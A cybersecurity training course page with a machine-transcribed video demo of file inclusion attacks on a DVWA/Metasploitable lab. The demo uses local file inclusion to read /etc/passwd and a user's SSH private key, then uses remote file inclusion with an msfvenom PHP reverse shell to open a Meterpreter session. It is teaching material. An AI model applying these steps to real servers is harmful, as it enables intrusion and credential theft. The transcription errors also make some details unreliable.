File Inclusion Demo

Video Activity
Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or

Already have an account? Sign In »

Time
18 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
00:01
So here we are on D V W A here's an apple Isar. So I know it's a boon to which means it's Lennox, which means if I look for the etc. Password file, it will work. I'm looking for a windows file. It won't work because this is not a Windows box. Also we're looking at PHP and we're on Apache 2.2 point eight.
00:19
And I also know the version of PHP here.
00:23
So I can see this page parameter is including this include PHP
00:29
file. Now
00:31
with Delphi the dot dot slash matters because if I do this and it says etc, password,
00:38
this might not work. So it really depends how far I go back. So you can just keep doing this manually
00:44
again, this might take a long time depending on how far back we go and how
00:49
how the PHP has written.
00:52
But here we go.
00:53
So now we see the etc. Password file. So I'll view source and see how much nicer that is than um in the slide.
01:02
So I'm looking for
01:03
the users, I see MSF admin
01:07
and because I know how uh Lennox is structured and I'm looking at the MSF admin user
01:14
but I'm gonna attack on at the end here
01:18
sort of etc. Password
01:23
is home MSF admin, which is that user 1000
01:27
dot S S H I D R esa.
01:30
If they have their chemists configured, I should be able to read it
01:36
and I can see here that it is mis configured
01:38
and I am I am able to view it. So now what do you do?
01:42
So again, I view Source, I grabbed this key
01:47
and what I'm gonna do
01:49
is that I'm going to make my own key. MSF admin,
01:53
I'm going to paste that private key information into here.
01:57
Going to exit out of this. And you have to charm a this to you can do 400
02:05
or 600.
02:07
Yeah.
02:07
And now what I should be able to do is ssh.
02:10
Mhm.
02:12
MSF admin. And then give it on that boxes. MSF admin, which I did. So
02:17
now I'm on the box because I use elephant to grab the ssh key.
02:23
That's great.
02:24
So let's exit out of here
02:27
and let me show you what happens with our if I remote file inclusion. Now
02:30
Remember I need to be able to see if it can reach out to my server. So NLVP 4444
02:38
and I'll go back and I'm going to change this
02:43
To my server. HDP 19216812- 8.4444.
02:53
And I see here that the connection was received, it's not looking for any file in particular so I can name my file whatever I want to.
03:00
I'm going to kill the connection here.
03:04
And what I'm gonna do is I'm going to create that shell dot txt file
03:08
with MSF venom.
03:12
Now you'll notice the payloads, PHP interpreter, reverse TCP with my host as well as the L host and my L port is 4444
03:22
And we're gonna make this into this TxT file.
03:24
Like I said sometimes when you make it a PHP file, it will execute on your own server. And you're like, oh, this looks awfully familiar. Well that's because it's your own server.
03:34
So the other thing to do is we want to set up uh met despite.
03:40
So you know, I like to execute things directly from the terminal here
03:46
before actually loading municipal the municipal a framework
03:52
so I should have everything set up and ready to go.
04:03
So what I'll do now is I need to set up a server on my own machine.
04:10
So I'm gonna use python three
04:12
an http server.
04:15
And
04:17
I'm going to
04:23
change this now.
04:28
Two. HDP
04:30
1921681228
04:33
8000. Because that's where our servers running on 48,000
04:38
and shell dot txt.
04:43
All right. That's on 48,000. That's why I chose that. And you can see that interpreter session is opened.
04:49
Mhm.
04:50
And I see there it is. So, if I interact with it, session one Sys info.
04:57
I see I'm on my display table here.
04:59
So that's how to leverage both. L if I to find valuable information in this case an ssh key where we can ssh onto this machine
05:08
or r. F. I where we can host our own file and have the server reach out and execute our shell so that now we're on the box here.
05:19
So those are file inclusion vulnerabilities, and that's how to exploit them.
Up Next